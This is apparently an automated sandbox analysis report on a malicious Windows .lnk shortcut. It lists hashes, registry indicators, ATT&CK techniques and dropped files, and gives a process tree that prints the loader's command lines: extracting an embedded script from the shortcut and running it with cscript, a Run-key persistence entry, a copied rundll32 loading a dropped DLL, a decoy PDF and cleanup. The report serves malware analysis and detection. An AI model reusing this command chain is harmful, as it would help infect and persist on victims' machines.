7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10/04/2024, 07:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505.lnk
Size

265KB
MD5

996580c90c5efe2a727d22a77b7e69eb
SHA1

c6c65bf93081e4af6dcf24cb6be6cbd533eaa415
SHA256

7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505
SHA512

c64d54692ee234014b57ebf57cb69baf8b965668f09b76533533abc54a1751108d11afd47a4db1c34b2eb08ee8fa906697c218404952fa97d7dbfab61ff42022
SSDEEP

6144:8t4XBZPUnEDOTLAfO/2XXnJZyRYMIgHyWzfYxg:8t4XoOOTuO/2nn6TSkQxg

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	cscript.exe

Executes dropped EXE 1 IoCs

pid	Process
736	rundll32.exe

Loads dropped DLL 1 IoCs

pid	Process
736	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CTFM0N.EXE = "cmd /c start C:\\Users\\Admin\\AppData\\Local\\Temp\\ctfmon.bat"	cscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
736	rundll32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4820	AcroRd32.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe
4820	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4188 wrote to memory of 3764	4188	cmd.exe	87
PID 4188 wrote to memory of 3764	4188	cmd.exe	87
PID 3764 wrote to memory of 4596	3764	cmd.exe	88
PID 3764 wrote to memory of 4596	3764	cmd.exe	88
PID 3764 wrote to memory of 3756	3764	cmd.exe	89
PID 3764 wrote to memory of 3756	3764	cmd.exe	89
PID 3764 wrote to memory of 3260	3764	cmd.exe	90
PID 3764 wrote to memory of 3260	3764	cmd.exe	90
PID 3260 wrote to memory of 5004	3260	cscript.exe	95
PID 3260 wrote to memory of 5004	3260	cscript.exe	95
PID 3260 wrote to memory of 2364	3260	cscript.exe	97
PID 3260 wrote to memory of 2364	3260	cscript.exe	97
PID 5004 wrote to memory of 4820	5004	cmd.exe	99
PID 5004 wrote to memory of 4820	5004	cmd.exe	99
PID 5004 wrote to memory of 4820	5004	cmd.exe	99
PID 3260 wrote to memory of 868	3260	cscript.exe	103
PID 3260 wrote to memory of 868	3260	cscript.exe	103
PID 868 wrote to memory of 4288	868	cmd.exe	105
PID 868 wrote to memory of 4288	868	cmd.exe	105
PID 4288 wrote to memory of 736	4288	cmd.exe	106
PID 4288 wrote to memory of 736	4288	cmd.exe	106
PID 4288 wrote to memory of 736	4288	cmd.exe	106
PID 3260 wrote to memory of 3516	3260	cscript.exe	107
PID 3260 wrote to memory of 3516	3260	cscript.exe	107
PID 4820 wrote to memory of 804	4820	AcroRd32.exe	111
PID 4820 wrote to memory of 804	4820	AcroRd32.exe	111
PID 4820 wrote to memory of 804	4820	AcroRd32.exe	111
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112
PID 804 wrote to memory of 4856	804	RdrCEF.exe	112

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\Admin\AppData\Local\Temp\~254134656.js & cscript C:\Users\Admin\AppData\Local\Temp\~254134656.js 9&exit))&cls
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk
    3⤵
    PID:4596
- - C:\Windows\system32\findstr.exe
    findstr /b "var onm=" "C:\Users\Admin\AppData\Local\Temp\7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505.lnk"
    3⤵
    PID:3756
- - C:\Windows\system32\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp\~254134656.js 9
    3⤵
    - Checks computer location settings
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3260
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Local\Temp\account.pdf
      4⤵
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:5004
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\account.pdf"
        5⤵
        Checks processor information in registry
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4820
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:804
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=60C076338AC2831D5C7E5A12299F5854 --mojo-platform-channel-handle=1624 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        
        PID:4856
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FA8BE3BA0CE29307AE92D3A91147143B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FA8BE3BA0CE29307AE92D3A91147143B --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
        7⤵
        
        PID:3212
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=66B4C7BBF7E87A7858C4964D65861EE7 --mojo-platform-channel-handle=2144 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        
        PID:2856
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7919C223D16C5FCA984AA02E74DE5C94 --mojo-platform-channel-handle=2340 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        
        PID:628
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4DD23533BE8EE11B3833CF01E358B92F --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        
        PID:3988
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1522FB20B06708324EA7F63B2248454E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1522FB20B06708324EA7F63B2248454E --renderer-client-id=7 --mojo-platform-channel-handle=2344 --allow-no-sandbox-job /prefetch:1
        7⤵
        
        PID:2748
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\rundll32.exe /y
      4⤵
      PID:2364
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\ctfmon.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:868
    - - C:\Windows\system32\cmd.exe
        
        cmd /c start rundll32.exe MSADOCG.DLL,DllUnregisterServer
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4288
      - C:\Users\Admin\AppData\Local\Temp\rundll32.exe
        
        rundll32.exe MSADOCG.DLL,DllUnregisterServer
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:736
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del /q C:\Users\Admin\AppData\Local\Temp\~254134656.js
      4⤵
      PID:3516

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
1138420465fca0a96f96783a2bb4ed9b

SHA1
09d3a81a9a211347a095ec7f3592026f28137c1c

SHA256
75b0d4b3f2ffdf697d78346bcc23e5c811a119312a5bf73e647e608e38af45b0

SHA512
d770b496eb8143f243a21ca752d6a8f9e0709c7f862bad5a100be6a5dc10e281cf63f73f26497806e59d06c6b85a2b956e9bc3ff92224f9c1e3c22341975af7b

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\DPLAY.LIB

Filesize
35KB

MD5
f4b1528911b6cce7abba58d87c3c2c10

SHA1
4b99b8d7de07fcf96cc667575bc83dae2449418a

SHA256
66982ebd5ebb75633723c7057a1e948ac3aafe3ff808397eb0c55c853c82f9e6

SHA512
540794c669da902331d004abbd8e8a4589d7019257cae9a67086c8de0ad0bb463ac14276961067104adbcdc7ab477253fd1a8a5d93aa96833dcedaf834ea70e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSADOCG.DLL

Filesize
102KB

MD5
77afbb6a6b85eecaad65d15e066476ec

SHA1
d087874940617cab3254f09389806d03a1336e31

SHA256
38c815729f34aef6af531edf3f0c3f09635686dbe7e5db5cb97eca5b2b5b7712

SHA512
5211df683de5e9a46d39a58a54b8440196e31b2803d77668b273d4cd8697dc5fb7ba5dcd903e258207c6be05a13d6e688c5a63348f2849e25047fead61b76d0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\account.pdf

Filesize
44KB

MD5
f86f4204b915222382b7f528982e3808

SHA1
96471f04d69464b42162d70324a3f08cd9003ac0

SHA256
a655499c165b3056370c05e0861a5f6a09db2e581e1461f27ade9c9ca18d2850

SHA512
5a9f665da4a4d7ae0d8bf166af1ac5b03f78199ff9cd54c55e5a2f419d9f22eaf180ba3800be66bb7941dea51ecba59da3de9c1969a5604b8cfcab2d1b6eefaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ctfmon.bat

Filesize
76B

MD5
eac72dff542f3465320f1ef235754832

SHA1
7d6e8ff68fbb442c10d7606da1fe8020a1f733a9

SHA256
7cacdc84a0d690564c8471a4f58ab192ef7d9091ab0809933f616010bbf6846a

SHA512
52fa0161d785bf7bb3aa9c2330a06d9ff4623d2d459a3624214d9ff5d98af12cb2dee54392ab909acf21e3e03cbc07f35ef46764e7715358ca60d3df38c47178

Download Submit
C:\Users\Admin\AppData\Local\Temp\rundll32.exe

Filesize
60KB

MD5
889b99c52a60dd49227c5e485a016679

SHA1
8fa889e456aa646a4d0a4349977430ce5fa5e2d7

SHA256
6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910

SHA512
08933106eaf338dd119c45cbf1f83e723aff77cc0f8d3fc84e36253b1eb31557a54211d1d5d1cb58958188e32064d451f6c66a24b3963cccd3de07299ab90641

Download Submit
C:\Users\Admin\AppData\Local\Temp\~254134656.js

Filesize
263KB

MD5
ecf6bffdc0358525bc2ab7dd7eed6b9e

SHA1
4fb249a7fbffeb32a730e2b491b1c5c42a131d73

SHA256
9d9a0af09fc9065bacabf1a193cad4386b5e8e5101639e07efa82992b723f3b0

SHA512
8468181156bc095ebba162bd2772e79803bbd911e2108b68d1dc2ade6b2a14733bd616e435613881a214f96d55167b7ded478215e1b1062f4f03098d3740435f

Download Submit
memory/736-16-0x0000000010000000-0x000000001001E000-memory.dmp

Filesize
120KB

Download
memory/736-18-0x00000000027B0000-0x00000000027B9000-memory.dmp

Filesize
36KB

Download
memory/736-20-0x00000000027E0000-0x00000000027F2000-memory.dmp

Filesize
72KB

Download
memory/736-150-0x0000000010000000-0x000000001001E000-memory.dmp

Filesize
120KB

Download
memory/736-151-0x00000000027E0000-0x00000000027F2000-memory.dmp

Filesize
72KB

Download